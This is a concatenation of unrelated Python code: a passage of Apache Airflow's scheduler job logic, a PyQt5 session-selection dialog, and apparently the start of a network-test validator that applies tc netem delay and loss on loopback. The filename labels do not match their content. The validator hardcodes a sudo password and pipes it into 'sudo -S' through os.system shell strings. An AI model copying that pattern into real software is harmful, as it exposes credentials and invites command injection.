'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs'),
processor_poll_interval=conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle=False,
log=None,
*args, **kwargs):
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
if log:
self._log = log
self.using_sqlite = False
self.using_mysql = False
if conf.get('core', 'sql_alchemy_conn').lower().startswith('sqlite'):
self.using_sqlite = True
if conf.get('core', 'sql_alchemy_conn').lower().startswith('mysql'):
self.using_mysql = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
def register_exit_signals(self):
"""
Register signals that stop child processes
"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame): # pylint: disable=unused-argument
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
        normally should not happen, but it can if the state of DagRuns is
        changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
# pylint: disable=comparison-with-callable
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None))) # pylint: disable=no-member
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state}, synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states: frozenset, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
        :return: A map from dag_id to # of task instances in the given states, and
            a map from (dag_id, task_id) to # of task instances in the given states
        :rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: Dict[str, int] = defaultdict(int)
task_map: Dict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
# pylint: disable=too-many-locals,too-many-statements
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:return: list[airflow.models.TaskInstance]
"""
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
task_instances_to_examine = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR, and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id.is_(None), not_(DR.run_id.like(f"{DagRunType.BACKFILL_JOB.value}__%"))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id.is_(None), not_(DM.is_paused)))
.filter(TI.state == State.SCHEDULED)
.all()
)
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=list(EXECUTION_STATES), session=session)
num_tasks_in_executor = 0
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
# pylint: disable=too-many-nested-blocks
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
num_starving_tasks_total += num_starving_tasks
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
        # so these don't expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:rtype: list[airflow.models.taskinstance.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
tis_to_set_to_queued = (
session
.query(TI)
.filter(TI.filter_for_tis(task_instances))
.filter(TI.state == State.SCHEDULED)
.with_for_update()
.all()
)
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_queued)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow()}, synchronize_session=False
)
session.commit()
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in tis_to_set_to_queued]
task_instance_str = "\n\t".join([repr(x) for x in tis_to_set_to_queued])
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
        :param simple_dag_bag: Should contain all of the task_instances' DAGs
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
        and that we do not exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:return: Number of task instance with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session=None):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1, # pylint: disable=protected-access
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
            # set TIs back to the SCHEDULED state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
# pylint: disable=too-many-nested-blocks
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state in (State.FAILED, State.SUCCESS):
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(
"Executor reports task instance %s finished (%s) although the task says its %s. "
"Was the task killed externally?",
ti, state, ti.state
)
simple_dag = simple_dag_bag.get_dag(dag_id)
self.processor_agent.send_callback_to_execute(
full_filepath=simple_dag.full_filepath,
task_instance=ti,
msg="Executor reports task instance finished ({}) although the task says its {}. "
"Was the task killed externally?".format(state, ti.state)
)
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor_class not in (
ExecutorLoader.LOCAL_EXECUTOR, ExecutorLoader.SEQUENTIAL_EXECUTOR, ExecutorLoader.DASK_EXECUTOR
):
pickle_dags = True
self.log.info("Processing each file at most %s times", self.num_runs)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
self.num_runs,
type(self)._create_dag_file_processor,
processor_timeout,
self.dag_ids,
pickle_dags,
async_mode)
try:
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
self.register_exit_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
self._run_scheduler_loop()
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(file_path, failure_callback_requests, dag_ids, pickle_dags):
"""
Creates DagFileProcessorProcess instance.
"""
return DagFileProcessorProcess(
file_path=file_path,
pickle_dags=pickle_dags,
dag_id_white_list=dag_ids,
failure_callback_requests=failure_callback_requests
)
def _run_scheduler_loop(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
# For the execute duration, parse and schedule DAGs
while True:
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.run_single_parsing_loop()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug("Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
simple_dags = self.processor_agent.harvest_simple_dags()
self.log.debug("Harvested %d SimpleDAGs", len(simple_dags))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
self._emit_pool_metrics()
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug("Ran scheduling loop in %.2f seconds", loop_duration)
if not is_unit_test:
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files have been processed %d times",
self.num_runs)
break
def _validate_and_run_task_instances(self, simple_dag_bag: SimpleDagBag) -> bool:
if len(simple_dag_bag.simple_dags) > 0:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e: # pylint: disable=broad-except
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag):
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag)
@provide_session
def _emit_pool_metrics(self, session=None) -> None:
pools = models.Pool.slots_stats(session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
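# --- Illustrative sketch (editor's addition, not part of Airflow) -------------
# _find_executable_task_instances above sorts candidate task instances by
# (-priority_weight, execution_date) and hands out pool slots until they run
# out, skipping tasks whose DAG is already at its concurrency limit. A
# stripped-down, in-memory version of that selection, assuming a single pool
# and a single per-DAG limit (SketchTI and pick_executable are hypothetical
# names, not Airflow APIs):
from collections import defaultdict
from typing import List, NamedTuple
class SketchTI(NamedTuple):
    dag_id: str
    task_id: str
    priority_weight: int
    execution_date: int  # stands in for a datetime
def pick_executable(tis: List[SketchTI], open_slots: int, dag_limit: int) -> List[SketchTI]:
    running_per_dag = defaultdict(int)
    picked = []
    for ti in sorted(tis, key=lambda t: (-t.priority_weight, t.execution_date)):
        if open_slots <= 0:
            break  # pool exhausted; the remaining tasks are "starving"
        if running_per_dag[ti.dag_id] >= dag_limit:
            continue  # DAG concurrency limit reached, try the next task
        picked.append(ti)
        running_per_dag[ti.dag_id] += 1
        open_slots -= 1
    return picked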
|
rostopic_names_test.py
|
#!/usr/bin/env python3
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWebEngineWidgets import QWebEngineView, QWebEngineSettings
import os
# from PyQt5.QtDataVisualization import (Q3DSurface, Q3DScatter, Q3DTheme, QAbstract3DGraph,
# QHeightMapSurfaceDataProxy, QSurface3DSeries, QSurfaceDataItem,
# QSurfaceDataProxy, QValue3DAxis, QScatter3DSeries, QAbstract3DSeries, QScatterDataItem,QLogValue3DAxisFormatter)
from appv3 import *
import threading
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(600, 480)
self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout.setContentsMargins(11, 11, 11, 11)
self.verticalLayout.setSpacing(6)
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(Dialog)
self.label.setMaximumSize(QtCore.QSize(16777215, 40))
font = QtGui.QFont()
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setSpacing(6)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setSpacing(6)
self.horizontalLayout.setObjectName("horizontalLayout")
self.label_2 = QtWidgets.QLabel(Dialog)
self.label_2.setMinimumSize(QtCore.QSize(0, 0))
self.label_2.setMaximumSize(QtCore.QSize(16777215, 40))
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.label_2.setFont(font)
self.label_2.setObjectName("label_2")
self.horizontalLayout.addWidget(self.label_2)
self.comboBox = QtWidgets.QComboBox(Dialog)
self.comboBox.setMaximumSize(QtCore.QSize(88888, 16777215))
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(False)
font.setWeight(50)
self.comboBox.setFont(font)
self.comboBox.setObjectName("comboBox")
self.comboBox.addItem("")
self.comboBox.addItem("")
self.comboBox.addItem("")
self.horizontalLayout.addWidget(self.comboBox)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.verticalLayout_2.addLayout(self.horizontalLayout)
self.label_3 = QtWidgets.QLabel(Dialog)
font = QtGui.QFont()
font.setPointSize(9)
font.setBold(True)
font.setWeight(75)
self.label_3.setFont(font)
self.label_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_3.setObjectName("label_3")
self.verticalLayout_2.addWidget(self.label_3)
self.listWidget = QtWidgets.QListWidget(Dialog)
self.listWidget.setFlow(QtWidgets.QListView.TopToBottom)
self.listWidget.setProperty("isWrapping", True)
self.listWidget.setLayoutMode(QtWidgets.QListWidget.SinglePass)
self.listWidget.setObjectName("listView")
# item = QtWidgets.QListWidgetItem()
# icon = QtGui.QIcon()
# icon.addPixmap(QtGui.QPixmap("ground_foreground.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
# item.setIcon(icon)
# self.listWidget.addItem(item)
self.verticalLayout_2.addWidget(self.listWidget)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setSpacing(6)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.button_start = QtWidgets.QPushButton(Dialog)
self.button_start.setObjectName("button_start")
self.button_start.clicked.connect(self.startWindow)
self.horizontalLayout_2.addWidget(self.button_start)
self.button_load = QtWidgets.QPushButton(Dialog)
self.button_load.setObjectName("button_load")
self.horizontalLayout_2.addWidget(self.button_load)
self.button_cancel = QtWidgets.QPushButton(Dialog)
self.button_cancel.setObjectName("button_cancel")
self.button_cancel.clicked.connect(QtCore.QCoreApplication.instance().quit)
self.horizontalLayout_2.addWidget(self.button_cancel)
self.verticalLayout_2.addLayout(self.horizontalLayout_2)
self.verticalLayout.addLayout(self.verticalLayout_2)
self.comboBox.currentTextChanged.connect(self.on_combobox_changed)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
self.x = 0
def startWindow(self):
print('a window should start')
self.MainWindow = QtWidgets.QMainWindow()
self.ui = Ui_MainWindow()
self.ui.setupUi(self.MainWindow)
self.MainWindow.show()
        Dialog.close()  # relies on the module-level Dialog created in the __main__ block
def on_combobox_changed(self, value):
# print(os.path.dirname(__file__))
self.listWidget.clear()
self.x = 0
# if (value == 'None'):
# import random_keyStrokes
if (value == 'Physical'):
from rostopic_names import final_list
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(os.path.dirname(__file__) + "/Physical2.jpg"), QtGui.QIcon.Normal,
QtGui.QIcon.Off)
for list_itm in final_list:
item = QtWidgets.QListWidgetItem()
font = QtGui.QFont()
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
item.setFont(font)
item.setIcon(icon)
self.listWidget.addItem(item)
self.listWidget.setIconSize(QtCore.QSize(50, 50))
_translate = QtCore.QCoreApplication.translate
item = self.listWidget.item(self.x)
item.setText(_translate("Dialog", list_itm))
self.x += 1
# rospy.init_node('talker', anonymous=True)
# t = threading.Thread(target=talker)
# t.start()
if (value == 'Simulation'):
from rostopic_names import final_list
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(os.path.dirname(__file__) + "/Simulation2.jpg"), QtGui.QIcon.Normal,
QtGui.QIcon.Off)
for list_itm in final_list:
item = QtWidgets.QListWidgetItem()
font = QtGui.QFont()
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
item.setFont(font)
item.setIcon(icon)
self.listWidget.addItem(item)
self.listWidget.setIconSize(QtCore.QSize(50, 50))
_translate = QtCore.QCoreApplication.translate
item = self.listWidget.item(self.x)
item.setText(_translate("Dialog", list_itm))
self.x += 1
# print(value)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.label.setText(_translate("Dialog", "Hello and welcome to MSSR application!"))
self.label_2.setText(_translate("Dialog", "Please choose the next session type"))
self.comboBox.setItemText(0, _translate("Dialog", "None"))
self.comboBox.setItemText(1, _translate("Dialog", "Simulation"))
self.comboBox.setItemText(2, _translate("Dialog", "Physical"))
self.label_3.setText(_translate("Dialog", "Connected to / Is active:"))
self.button_start.setText(_translate("Dialog", "Start"))
self.button_load.setText(_translate("Dialog", "Load"))
self.button_cancel.setText(_translate("Dialog", "Cancel"))
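# --- Illustrative sketch (editor's addition) ----------------------------------
# on_combobox_changed above repeats the same "bold, icon-decorated list item"
# loop for the Physical and Simulation branches. The hypothetical helper below
# (not used by Ui_Dialog, and reusing the QtCore/QtGui/QtWidgets imports at the
# top of this file) shows how that duplication could be factored out:
def populate_topic_list(list_widget, topic_names, icon_path):
    icon = QtGui.QIcon()
    icon.addPixmap(QtGui.QPixmap(icon_path), QtGui.QIcon.Normal, QtGui.QIcon.Off)
    font = QtGui.QFont()
    font.setPointSize(20)
    font.setBold(True)
    font.setWeight(75)
    list_widget.clear()
    list_widget.setIconSize(QtCore.QSize(50, 50))
    for name in topic_names:
        item = QtWidgets.QListWidgetItem(name)
        item.setFont(font)
        item.setIcon(icon)
        list_widget.addItem(item)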
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Dialog = QtWidgets.QDialog()
ui = Ui_Dialog()
ui.setupUi(Dialog)
Dialog.show()
sys.exit(app.exec_())
|
validate.py
|
#!/usr/bin/env python3
import argparse
import os
import atexit
import textwrap
import time
import tempfile
import threading
import subprocess
import barrier
import finishedSignal
import signal
import random
import time
from enum import Enum
from collections import defaultdict, OrderedDict
BARRIER_IP = 'localhost'
BARRIER_PORT = 10000
SIGNAL_IP = 'localhost'
SIGNAL_PORT = 11000
PROCESSES_BASE_IP = 11000
# Do not run multiple validations concurrently!
class TC:
def __init__(self, losses, interface="lo", needSudo=True, sudoPassword="dcl"):
self.losses = losses
self.interface = interface
self.needSudo = needSudo
self.sudoPassword = sudoPassword
cmd1 = 'tc qdisc add dev {} root netem 2>/dev/null'.format(
self.interface)
cmd2 = 'tc qdisc change dev {} root netem delay {} {} distribution normal loss {} {} reorder {} {}'.format(
self.interface, *self.losses['delay'], *self.losses['loss'], *self.losses['reordering'])
if self.needSudo:
os.system("echo {} | sudo -S {}".format(self.sudoPassword, cmd1))
os.system("echo {} | sudo -S {}".format(self.sudoPassword, cmd2))
else:
os.system(cmd1)
os.system(cmd2)
atexit.register(self.cleanup)
def __str__(self):
ret = """\
Interface: {}
Distribution: Normal
Delay: {} {}
Loss: {} {}
Reordering: {} {}""".format(
self.interface,
*self.losses['delay'],
*self.losses['loss'],
*self.losses['reordering'])
return textwrap.dedent(ret)
def cleanup(self):
cmd = 'tc qdisc del dev {} root 2>/dev/null'.format(self.interface)
if self.needSudo:
os.system("echo '{}' | sudo -S {}".format(self.sudoPassword, cmd))
else:
os.system(cmd)
